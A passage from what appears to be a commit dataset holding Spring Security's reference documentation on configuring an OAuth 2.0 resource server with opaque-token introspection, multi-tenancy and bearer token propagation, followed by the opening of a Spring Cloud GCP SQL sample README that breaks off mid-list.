.introspectionUri(\"https:\/\/idp.example.com\/introspect\")\n .introspectionClientCredentials(\"client\", \"secret\")\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredIntrospectionUri : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken {\n introspectionUri = \"https:\/\/idp.example.com\/introspect\"\n introspectionClientCredentials(\"client\", \"secret\")\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<bean id=\"opaqueTokenIntrospector\"\n class=\"org.springframework.security.oauth2.server.resource.introspection.NimbusOpaqueTokenIntrospector\">\n <constructor-arg value=\"https:\/\/idp.example.com\/introspect\"\/>\n <constructor-arg value=\"client\"\/>\n <constructor-arg value=\"secret\"\/>\n<\/bean>\n----\n====\n\nUsing `introspectionUri()` takes precedence over any configuration property.\n\n[[oauth2resourceserver-opaque-introspector-dsl]]\n==== Using `introspector()`\n\nMore powerful than `introspectionUri()` is `introspector()`, which will completely replace any Boot auto configuration of `OpaqueTokenIntrospector`:\n\n.Introspector Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredIntrospector extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .opaqueToken(opaqueToken -> opaqueToken\n .introspector(myCustomIntrospector())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredIntrospector : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken {\n introspector = myCustomIntrospector()\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <opaque-token introspector-ref=\"myCustomIntrospector\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nThis is handy when deeper configuration, like <<oauth2resourceserver-opaque-authorization-extraction,authority mapping>>, <<oauth2resourceserver-opaque-jwt-introspector,JWT revocation>>, or <<oauth2resourceserver-opaque-timeouts,request timeouts>>, is necessary.\n\n[[oauth2resourceserver-opaque-introspector-bean]]\n==== Exposing a `OpaqueTokenIntrospector` `@Bean`\n\nOr, exposing a `OpaqueTokenIntrospector` `@Bean` has the same effect as `introspector()`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new NimbusOpaqueTokenIntrospector(introspectionUri, clientId, clientSecret);\n}\n----\n\n[[oauth2resourceserver-opaque-authorization]]\n=== Configuring Authorization\n\nAn OAuth 2.0 Introspection endpoint will typically return a `scope` attribute, indicating the scopes (or authorities) it's been granted, for example:\n\n`{ ..., \"scope\" : \"messages contacts\"}`\n\nWhen this is the case, Resource Server will attempt to coerce these scopes into a list of granted authorities, prefixing each scope with the string \"SCOPE_\".\n\nThis means that to protect an endpoint or method with a scope derived from an Opaque Token, the 
corresponding expressions should include this prefix:\n\n.Authorization Opaque Token Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MappedAuthorities extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests -> authorizeRequests\n .mvcMatchers(\"\/contacts\/**\").hasAuthority(\"SCOPE_contacts\")\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_messages\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::opaqueToken);\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-url pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-url pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <opaque-token introspector-ref=\"opaqueTokenIntrospector\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nOr similarly with method security:\n\n```java\n@PreAuthorize(\"hasAuthority('SCOPE_messages')\")\npublic List<Message> getMessages(...) {}\n```\n\n[[oauth2resourceserver-opaque-authorization-extraction]]\n==== Extracting Authorities Manually\n\nBy default, Opaque Token support will extract the scope claim from an introspection response and parse it into individual `GrantedAuthority` instances.\n\nFor example, if the introspection response were:\n\n[source,json]\n----\n{\n \"active\" : true,\n \"scope\" : \"message:read message:write\"\n}\n----\n\nThen Resource Server would generate an `Authentication` with two authorities, one for `message:read` and the other for `message:write`.\n\nThis can, of course, be customized using a custom `OpaqueTokenIntrospector` that takes a look at the attribute set and converts them in its own way:\n\n[source,java]\n----\npublic class CustomAuthoritiesOpaqueTokenIntrospector implements OpaqueTokenIntrospector {\n private OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal principal = this.delegate.introspect(token);\n return new DefaultOAuth2AuthenticatedPrincipal(\n principal.getName(), principal.getAttributes(), extractAuthorities(principal));\n }\n\n private Collection<GrantedAuthority> extractAuthorities(OAuth2AuthenticatedPrincipal principal) {\n List<String> scopes = principal.getAttribute(OAuth2IntrospectionClaimNames.SCOPE);\n return scopes.stream()\n .map(SimpleGrantedAuthority::new)\n .collect(Collectors.toList());\n }\n}\n----\n\nThereafter, this custom introspector can be configured simply by exposing it as a `@Bean`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new CustomAuthoritiesOpaqueTokenIntrospector();\n}\n----\n\n[[oauth2resourceserver-opaque-timeouts]]\n=== Configuring Timeouts\n\nBy default, Resource Server uses connection and socket timeouts of 30 seconds each for coordinating with the authorization server.\n\nThis may be too short in some scenarios.\nFurther, it doesn't take into account more sophisticated patterns like back-off and discovery.\n\nTo adjust the way in which Resource Server connects to the authorization server, `NimbusOpaqueTokenIntrospector` accepts an instance of `RestOperations`:\n\n```java\n@Bean\npublic OpaqueTokenIntrospector introspector(RestTemplateBuilder builder) {\n RestOperations rest = builder\n 
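\/\/ basic auth supplies the introspection endpoint's client credentials;\n \/\/ the one-minute timeouts below relax the 30-second defaults\n 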
.basicAuthentication(clientId, clientSecret)\n .setConnectTimeout(Duration.ofSeconds(60))\n .setReadTimeout(Duration.ofSeconds(60))\n .build();\n\n return new NimbusOpaqueTokenIntrospector(introspectionUri, rest);\n}\n```\n\n[[oauth2resourceserver-opaque-jwt-introspector]]\n=== Using Introspection with JWTs\n\nA common question is whether or not introspection is compatible with JWTs.\nSpring Security's Opaque Token support has been designed to not care about the format of the token -- it will gladly pass any token to the introspection endpoint provided.\n\nSo, let's say that you've got a requirement that requires you to check with the authorization server on each request, in case the JWT has been revoked.\n\nEven though you are using the JWT format for the token, your validation method is introspection, meaning you'd want to do:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n opaque-token:\n introspection-uri: https:\/\/idp.example.org\/introspection\n client-id: client\n client-secret: secret\n----\n\nIn this case, the resulting `Authentication` would be `BearerTokenAuthentication`.\nAny attributes in the corresponding `OAuth2AuthenticatedPrincipal` would be whatever was returned by the introspection endpoint.\n\nBut, let's say that, oddly enough, the introspection endpoint only returns whether or not the token is active.\nNow what?\n\nIn this case, you can create a custom `OpaqueTokenIntrospector` that still hits the endpoint, but then updates the returned principal to have the JWT's claims as the attributes:\n\n[source,java]\n----\npublic class JwtOpaqueTokenIntrospector implements OpaqueTokenIntrospector {\n private OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n private JwtDecoder jwtDecoder = new NimbusJwtDecoder(new ParseOnlyJWTProcessor());\n\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal principal = this.delegate.introspect(token);\n try {\n Jwt jwt = this.jwtDecoder.decode(token);\n return new DefaultOAuth2AuthenticatedPrincipal(jwt.getClaims(), NO_AUTHORITIES);\n } catch (JwtException e) {\n throw new OAuth2IntrospectionException(e.getMessage(), e);\n }\n }\n\n private static class ParseOnlyJWTProcessor extends DefaultJWTProcessor<SecurityContext> {\n \tpublic JWTClaimsSet process(SignedJWT jwt, SecurityContext context)\n throws JOSEException {\n return jwt.getJWTClaimsSet();\n }\n }\n}\n----\n\nThereafter, this custom introspector can be configured simply by exposing it as a `@Bean`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new JwtOpaqueTokenIntrospector();\n}\n----\n\n[[oauth2resourceserver-opaque-userinfo]]\n=== Calling a `\/userinfo` Endpoint\n\nGenerally speaking, a Resource Server doesn't care about the underlying user, but instead about the authorities that have been granted.\n\nThat said, at times it can be valuable to tie the authorization statement back to a user.\n\nIf an application is also using `spring-security-oauth2-client`, having set up the appropriate `ClientRegistrationRepository`, then this is quite simple with a custom `OpaqueTokenIntrospector`.\nThe implementation below does three things:\n\n* Delegates to the introspection endpoint, to affirm the token's validity\n* Looks up the appropriate client registration associated with the `\/userinfo` endpoint\n* Invokes and returns the response from the `\/userinfo` endpoint\n\n[source,java]\n----\npublic class UserInfoOpaqueTokenIntrospector implements 
OpaqueTokenIntrospector {\n private final OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n private final OAuth2UserService oauth2UserService = new DefaultOAuth2UserService();\n\n private final ClientRegistrationRepository repository;\n\n \/\/ ... constructor\n\n @Override\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal authorized = this.delegate.introspect(token);\n Instant issuedAt = authorized.getAttribute(ISSUED_AT);\n Instant expiresAt = authorized.getAttribute(EXPIRES_AT);\n ClientRegistration clientRegistration = this.repository.findByRegistrationId(\"registration-id\");\n OAuth2AccessToken accessToken = new OAuth2AccessToken(BEARER, token, issuedAt, expiresAt);\n OAuth2UserRequest oauth2UserRequest = new OAuth2UserRequest(clientRegistration, accessToken);\n return this.oauth2UserService.loadUser(oauth2UserRequest);\n }\n}\n----\n\nIf you aren't using `spring-security-oauth2-client`, it's still quite simple.\nYou will simply need to invoke the `\/userinfo` endpoint with your own instance of `WebClient`:\n\n[source,java]\n----\npublic class UserInfoOpaqueTokenIntrospector implements OpaqueTokenIntrospector {\n private final OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n private final WebClient rest = WebClient.create();\n\n @Override\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal authorized = this.delegate.introspect(token);\n return makeUserInfoRequest(authorized);\n }\n}\n----\n\nEither way, having created your `OpaqueTokenIntrospector`, you should publish it as a `@Bean` to override the defaults:\n\n[source,java]\n----\n@Bean\nOpaqueTokenIntrospector introspector() {\n return new UserInfoOpaqueTokenIntrospector(...);\n}\n----\n\n[[oauth2reourceserver-opaqueandjwt]]\n=== Supporting both JWT and Opaque Token\n\nIn some cases, you may have a need to access both kinds of tokens.\nFor example, you may support more than one tenant where one tenant issues JWTs and the other issues opaque tokens.\n\nIf this decision must be made at request-time, then you can use an `AuthenticationManagerResolver` to achieve it, like so:\n\n[source,java]\n----\n@Bean\nAuthenticationManagerResolver<HttpServletRequest> tokenAuthenticationManagerResolver() {\n BearerTokenResolver bearerToken = new DefaultBearerTokenResolver();\n JwtAuthenticationProvider jwt = jwt();\n OpaqueTokenAuthenticationProvider opaqueToken = opaqueToken();\n\n return request -> {\n if (useJwt(request)) {\n return jwt::authenticate;\n } else {\n return opaqueToken::authenticate;\n }\n };\n}\n----\n\nNOTE: The implementation of `useJwt(HttpServletRequest)` will likely depend on custom request material like the path.\n\nAnd then specify this `AuthenticationManagerResolver` in the DSL:\n\n.Authentication Manager Resolver\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .authenticationManagerResolver(this.tokenAuthenticationManagerResolver)\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server authentication-manager-resolver-ref=\"tokenAuthenticationManagerResolver\"\/>\n<\/http>\n----\n====\n\n
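The `useJwt(HttpServletRequest)` check above was left abstract.\nA minimal sketch, assuming the hypothetical convention that JWT-issuing tenants are served under a dedicated path prefix (the prefix is an assumption for illustration, not part of any Spring Security API):\n\n[source,java]\n----\nprivate boolean useJwt(HttpServletRequest request) {\n \/\/ route by path: requests under \/jwt\/ use the JWT provider, everything else is introspected\n return request.getServletPath().startsWith(\"\/jwt\/\");\n}\n----\n\n[[oauth2resourceserver-multitenancy]]\n=== Multi-tenancy\n\nA resource server is considered multi-tenant when there are 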
multiple strategies for verifying a bearer token, keyed by some tenant identifier.\n\nFor example, your resource server may accept bearer tokens from two different authorization servers.\nOr, your authorization server may represent a multiplicity of issuers.\n\nIn each case, there are two things that need to be done and trade-offs associated with how you choose to do them:\n\n1. Resolve the tenant\n2. Propagate the tenant\n\n==== Resolving the Tenant By Claim\n\nOne way to differentiate tenants is by the issuer claim. Since the issuer claim accompanies signed JWTs, this can be done with the `JwtIssuerAuthenticationManagerResolver`, like so:\n\n.Multitenancy Tenant by JWT Claim\n====\n.Java\n[source,java,role=\"primary\"]\n----\nJwtIssuerAuthenticationManagerResolver authenticationManagerResolver = new JwtIssuerAuthenticationManagerResolver\n (\"https:\/\/idp.example.org\/issuerOne\", \"https:\/\/idp.example.org\/issuerTwo\");\n\nhttp\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .authenticationManagerResolver(authenticationManagerResolver)\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server authentication-manager-resolver-ref=\"authenticationManagerResolver\"\/>\n<\/http>\n\n<bean id=\"authenticationManagerResolver\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtIssuerAuthenticationManagerResolver\">\n <constructor-arg>\n <list>\n <value>https:\/\/idp.example.org\/issuerOne<\/value>\n <value>https:\/\/idp.example.org\/issuerTwo<\/value>\n <\/list>\n <\/constructor-arg>\n<\/bean>\n----\n====\n\nThis is nice because the issuer endpoints are loaded lazily.\nIn fact, the corresponding `JwtAuthenticationProvider` is instantiated only when the first request with the corresponding issuer is sent.\nThis allows for an application startup that is independent from those authorization servers being up and available.\n\n===== Dynamic Tenants\n\nOf course, you may not want to restart the application each time a new tenant is added.\nIn this case, you can configure the `JwtIssuerAuthenticationManagerResolver` with a repository of `AuthenticationManager` instances, which you can edit at runtime, like so:\n\n[source,java]\n----\nprivate void addManager(Map<String, AuthenticationManager> authenticationManagers, String issuer) {\n\tJwtAuthenticationProvider authenticationProvider = new JwtAuthenticationProvider\n\t (JwtDecoders.fromIssuerLocation(issuer));\n\tauthenticationManagers.put(issuer, authenticationProvider::authenticate);\n}\n\n\/\/ ...\n\nJwtIssuerAuthenticationManagerResolver authenticationManagerResolver =\n new JwtIssuerAuthenticationManagerResolver(authenticationManagers::get);\n\nhttp\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .authenticationManagerResolver(authenticationManagerResolver)\n );\n----\n\nIn this case, you construct `JwtIssuerAuthenticationManagerResolver` with a strategy for obtaining the `AuthenticationManager` given the issuer.\nThis approach allows us to add and remove elements from the repository (shown as a `Map` in the snippet) at runtime.\n\nNOTE: It would be unsafe to simply take any issuer and construct an `AuthenticationManager` from it.\nThe issuer should be one that the code can verify from a trusted source like a whitelist.\n\n===== Parsing the Claim Only Once\n\nYou may have observed that this strategy, while simple, comes with the 
trade-off that the JWT is parsed once by the `AuthenticationManagerResolver` and then again by the `JwtDecoder` later on in the request.\n\nThis extra parsing can be alleviated by configuring the `JwtDecoder` directly with a `JWTClaimsSetAwareJWSKeySelector` from Nimbus:\n\n[source,java]\n----\n@Component\npublic class TenantJWSKeySelector\n implements JWTClaimsSetAwareJWSKeySelector<SecurityContext> {\n\n\tprivate final TenantRepository tenants; <1>\n\tprivate final Map<String, JWSKeySelector<SecurityContext>> selectors = new ConcurrentHashMap<>(); <2>\n\n\tpublic TenantJWSKeySelector(TenantRepository tenants) {\n\t\tthis.tenants = tenants;\n\t}\n\n\t@Override\n\tpublic List<? extends Key> selectKeys(JWSHeader jwsHeader, JWTClaimsSet jwtClaimsSet, SecurityContext securityContext)\n\t\t\tthrows KeySourceException {\n\t\treturn this.selectors.computeIfAbsent(toTenant(jwtClaimsSet), this::fromTenant)\n\t\t\t\t.selectJWSKeys(jwsHeader, securityContext);\n\t}\n\n\tprivate String toTenant(JWTClaimsSet claimSet) {\n\t\treturn (String) claimSet.getClaim(\"iss\");\n\t}\n\n\tprivate JWSKeySelector<SecurityContext> fromTenant(String tenant) {\n\t\treturn Optional.ofNullable(this.tenants.findById(tenant)) <3>\n\t\t .map(t -> t.getAttribute(\"jwks_uri\"))\n\t\t\t\t.map(this::fromUri)\n\t\t\t\t.orElseThrow(() -> new IllegalArgumentException(\"unknown tenant\"));\n\t}\n\n\tprivate JWSKeySelector<SecurityContext> fromUri(String uri) {\n\t\ttry {\n\t\t\treturn JWSAlgorithmFamilyJWSKeySelector.fromJWKSetURL(new URL(uri)); <4>\n\t\t} catch (Exception e) {\n\t\t\tthrow new IllegalArgumentException(e);\n\t\t}\n\t}\n}\n----\n<1> A hypothetical source for tenant information\n<2> A cache for `JWSKeySelector`s, keyed by tenant identifier\n<3> Looking up the tenant is more secure than simply calculating the JWK Set endpoint on the fly - the lookup acts as a tenant whitelist\n<4> Create a `JWSKeySelector` via the types of keys that come back from the JWK Set endpoint - the lazy lookup here means that you don't need to configure all tenants at startup\n\nThe above key selector is a composition of many key selectors.\nIt chooses which key selector to use based on the `iss` claim in the JWT.\n\nNOTE: To use this approach, make sure that the authorization server is configured to include the claim set as part of the token's signature.\nWithout this, you have no guarantee that the issuer hasn't been altered by a bad actor.\n\nNext, we can construct a `JWTProcessor`:\n\n[source,java]\n----\n@Bean\nJWTProcessor jwtProcessor(JWTClaimsSetAwareJWSKeySelector keySelector) {\n\tConfigurableJWTProcessor<SecurityContext> jwtProcessor =\n new DefaultJWTProcessor<>();\n\tjwtProcessor.setJWTClaimsSetAwareJWSKeySelector(keySelector);\n\treturn jwtProcessor;\n}\n----\n\nAs you are already seeing, the trade-off for moving tenant-awareness down to this level is more configuration.\nWe have just a bit more.\n\nNext, we still want to make sure you are validating the issuer.\nBut since the issuer may be different per JWT, you'll need a tenant-aware validator, too:\n\n[source,java]\n----\n@Component\npublic class TenantJwtIssuerValidator implements OAuth2TokenValidator<Jwt> {\n\tprivate final TenantRepository tenants;\n\tprivate final Map<String, JwtIssuerValidator> validators = new ConcurrentHashMap<>();\n\n\tpublic TenantJwtIssuerValidator(TenantRepository tenants) {\n\t\tthis.tenants = tenants;\n\t}\n\n\t@Override\n\tpublic OAuth2TokenValidatorResult validate(Jwt token) {\n\t\treturn this.validators.computeIfAbsent(toTenant(token), 
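\/\/ create and cache one JwtIssuerValidator per tenant on first use\n\t\t\t\t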
this::fromTenant)\n\t\t\t\t.validate(token);\n\t}\n\n\tprivate String toTenant(Jwt jwt) {\n\t\treturn jwt.getIssuer().toString();\n\t}\n\n\tprivate JwtIssuerValidator fromTenant(String tenant) {\n\t\treturn Optional.ofNullable(this.tenants.findById(tenant))\n\t\t .map(t -> t.getAttribute(\"issuer\"))\n\t\t\t\t.map(JwtIssuerValidator::new)\n\t\t\t\t.orElseThrow(() -> new IllegalArgumentException(\"unknown tenant\"));\n\t}\n}\n----\n\nNow that we have a tenant-aware processor and a tenant-aware validator, we can proceed with creating our `JwtDecoder`:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder(JWTProcessor jwtProcessor, OAuth2TokenValidator<Jwt> jwtValidator) {\n\tNimbusJwtDecoder decoder = new NimbusJwtDecoder(jwtProcessor);\n\tOAuth2TokenValidator<Jwt> validator = new DelegatingOAuth2TokenValidator<>\n\t\t\t(JwtValidators.createDefault(), jwtValidator);\n\tdecoder.setJwtValidator(validator);\n\treturn decoder;\n}\n----\n\nWe've finished talking about resolving the tenant.\n\nIf you've chosen to resolve the tenant by something other than a JWT claim, then you'll need to make sure you address your downstream resource servers in the same way.\nFor example, if you are resolving it by subdomain, you may need to address the downstream resource server using the same subdomain.\n\nHowever, if you resolve it by a claim in the bearer token, read on to learn about <<oauth2resourceserver-bearertoken-resolver,Spring Security's support for bearer token propagation>>.\n\n[[oauth2resourceserver-bearertoken-resolver]]\n=== Bearer Token Resolution\n\nBy default, Resource Server looks for a bearer token in the `Authorization` header.\nThis, however, can be customized in a couple of ways.\n\n==== Reading the Bearer Token from a Custom Header\n\nFor example, you may have a need to read the bearer token from a custom header.\nTo achieve this, you can wire a `HeaderBearerTokenResolver` instance into the DSL, as you can see in the following example:\n\n.Custom Bearer Token Header\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .oauth2ResourceServer(oauth2 -> oauth2\n .bearerTokenResolver(new HeaderBearerTokenResolver(\"x-goog-iap-jwt-assertion\"))\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server bearer-token-resolver-ref=\"bearerTokenResolver\"\/>\n<\/http>\n\n<bean id=\"bearerTokenResolver\"\n class=\"org.springframework.security.oauth2.server.resource.web.HeaderBearerTokenResolver\">\n <constructor-arg value=\"x-goog-iap-jwt-assertion\"\/>\n<\/bean>\n----\n====\n\n==== Reading the Bearer Token from a Form Parameter\n\nOr, you may wish to read the token from a form parameter, which you can do by configuring the `DefaultBearerTokenResolver`, as you can see below:\n\n.Form Parameter Bearer Token\n====\n.Java\n[source,java,role=\"primary\"]\n----\nDefaultBearerTokenResolver resolver = new DefaultBearerTokenResolver();\nresolver.setAllowFormEncodedBodyParameter(true);\nhttp\n .oauth2ResourceServer(oauth2 -> oauth2\n .bearerTokenResolver(resolver)\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server bearer-token-resolver-ref=\"bearerTokenResolver\"\/>\n<\/http>\n\n<bean id=\"bearerTokenResolver\"\n class=\"org.springframework.security.oauth2.server.resource.web.DefaultBearerTokenResolver\">\n <property name=\"allowFormEncodedBodyParameter\" value=\"true\"\/>\n<\/bean>\n----\n====\n\n
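With form decoding enabled, a client may send the token as an `access_token` parameter in the request body, as described in https:\/\/tools.ietf.org\/html\/rfc6750#section-2.2[RFC 6750, Section 2.2], for example:\n\n```http\nPOST \/endpoint HTTP\/1.1\nContent-Type: application\/x-www-form-urlencoded\n\naccess_token=some-token-value\n```\n\n=== Bearer Token Propagation\n\nNow that you're in possession of a bearer token, it might be handy to pass that to downstream services.\nThis is 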
quite simple with `{security-api-url}org\/springframework\/security\/oauth2\/server\/resource\/web\/reactive\/function\/client\/ServletBearerExchangeFilterFunction.html[ServletBearerExchangeFilterFunction]`, which you can see in the following example:\n\n[source,java]\n----\n@Bean\npublic WebClient rest() {\n return WebClient.builder()\n .filter(new ServletBearerExchangeFilterFunction())\n .build();\n}\n----\n\nWhen the above `WebClient` is used to perform requests, Spring Security will look up the current `Authentication` and extract any `{security-api-url}org\/springframework\/security\/oauth2\/core\/AbstractOAuth2Token.html[AbstractOAuth2Token]` credential.\nThen, it will propagate that token in the `Authorization` header.\n\nFor example:\n\n[source,java]\n----\nthis.rest.get()\n .uri(\"https:\/\/other-service.example.com\/endpoint\")\n .retrieve()\n .bodyToMono(String.class)\n .block();\n----\n\nThis will invoke `https:\/\/other-service.example.com\/endpoint`, adding the bearer token `Authorization` header for you.\n\nIn places where you need to override this behavior, it's a simple matter of supplying the header yourself, like so:\n\n[source,java]\n----\nthis.rest.get()\n .uri(\"https:\/\/other-service.example.com\/endpoint\")\n .headers(headers -> headers.setBearerAuth(overridingToken))\n .retrieve()\n .bodyToMono(String.class)\n .block();\n----\n\nIn this case, the filter will fall back and simply forward the request onto the rest of the web filter chain.\n\n[NOTE]\nUnlike the https:\/\/docs.spring.io\/spring-security\/site\/docs\/current-SNAPSHOT\/api\/org\/springframework\/security\/oauth2\/client\/web\/reactive\/function\/client\/ServletOAuth2AuthorizedClientExchangeFilterFunction.html[OAuth 2.0 Client filter function], this filter function makes no attempt to renew the token, should it be expired.\nTo obtain this level of support, please use the OAuth 2.0 Client filter.\n\n==== `RestTemplate` support\n\nThere is no dedicated support for `RestTemplate` at the moment, but you can achieve propagation quite simply with your own interceptor:\n\n[source,java]\n----\n@Bean\nRestTemplate rest() {\n\tRestTemplate rest = new RestTemplate();\n\trest.getInterceptors().add((request, body, execution) -> {\n\t\tAuthentication authentication = SecurityContextHolder.getContext().getAuthentication();\n\t\tif (authentication == null) {\n\t\t\treturn execution.execute(request, body);\n\t\t}\n\n\t\tif (!(authentication.getCredentials() instanceof AbstractOAuth2Token)) {\n\t\t\treturn execution.execute(request, body);\n\t\t}\n\n\t\tAbstractOAuth2Token token = (AbstractOAuth2Token) authentication.getCredentials();\n\t\trequest.getHeaders().setBearerAuth(token.getTokenValue());\n\t\treturn execution.execute(request, body);\n\t});\n\treturn rest;\n}\n----\n\n
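As with the `WebClient` filter function above, requests made through this `RestTemplate` pick up the current bearer token automatically.\nFor example, the following call to a hypothetical endpoint would carry the `Authorization` header for you:\n\n[source,java]\n----\nString response = this.rest.getForObject(\"https:\/\/other-service.example.com\/endpoint\", String.class);\n----\n\nAnd, like the filter function, the interceptor simply forwards the request unchanged when no bearer token is present.\n\n[[oauth2resourceserver-bearertoken-failure]]\n=== Bearer Token Failure\n\nA bearer token may be invalid for a number of reasons. 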
For example, the token may no longer be active.\n\nIn these circumstances, Resource Server throws an `InvalidBearerTokenException`.\nLike other exceptions, this results in an OAuth 2.0 Bearer Token error response:\n\n[source,http request]\n----\nHTTP\/1.1 401 Unauthorized\nWWW-Authenticate: Bearer error=\"invalid_token\", error_description=\"Unsupported algorithm of none\", error_uri=\"https:\/\/tools.ietf.org\/html\/rfc6750#section-3.1\"\n----\n\nAdditionally, it is published as an `AuthenticationFailureBadCredentialsEvent`, which you can <<servlet-events,listen for in your application>> like so:\n\n[source,java]\n----\n@Component\npublic class FailureEvents {\n\t@EventListener\n public void onFailure(AuthenticationFailureBadCredentialsEvent badCredentials) {\n\t\tif (badCredentials.getAuthentication() instanceof BearerTokenAuthenticationToken) {\n\t\t \/\/ ... handle\n }\n }\n}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9debe0aff000396f67045c17e3b70fc056ebcd3c","subject":"Fixes SQL password problem on sample README (#208)","message":"Fixes SQL password problem on sample README (#208)\n\n","repos":"spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp","old_file":"spring-cloud-gcp-examples\/spring-cloud-gcp-sql-example\/README.adoc","new_file":"spring-cloud-gcp-examples\/spring-cloud-gcp-sql-example\/README.adoc","new_contents":"= Spring Cloud GCP SQL Starter Example\n\nThis code sample demonstrates how to connect to a Google Cloud SQL instance using the\nlink:..\/..\/spring-cloud-gcp-starters\/spring-cloud-gcp-starter-sql\/README.adoc[Spring Cloud GCP SQL\nStarter].\n\nWe will create an instance, a database within the instance, populate the database and then query it.\n\n= Setup & Configuration\n\n1. Follow https:\/\/cloud.google.com\/sql\/docs\/mysql\/quickstart[these instructions] to set up a Google\nCloud Project with billing enabled and a Google Cloud SQL instance.\n\n2. Still within the Google Cloud Console, create a new database in the instance from the\n\"Databases\" section.\n\n3. Open the link:src\/main\/resources\/application.properties[application.properties] file and replace\n*[database-name]* with the name of the database you created in step 2 and *[instance-connection-name]*\nwith the instance connection name of the instance you created in step 1.\n+\nIf you set a root password, you should also add a `spring.datasource.password` property with the\npassword as the value.\n\n4. https:\/\/cloud.google.com\/sdk\/gcloud\/reference\/auth\/login[Authenticate in the Cloud SDK] or add\na `spring.cloud.gcp.sql.credentials.location` property with the path on your local file system to\na credentials file, prepended with `file:`.\n\n5. Run the `SqlApplication` Spring Boot app. The database will be populated based on the\nlink:src\/main\/resources\/schema.sql[schema.sql] and link:src\/main\/resources\/data.sql[data.sql] files.\n\n6. 
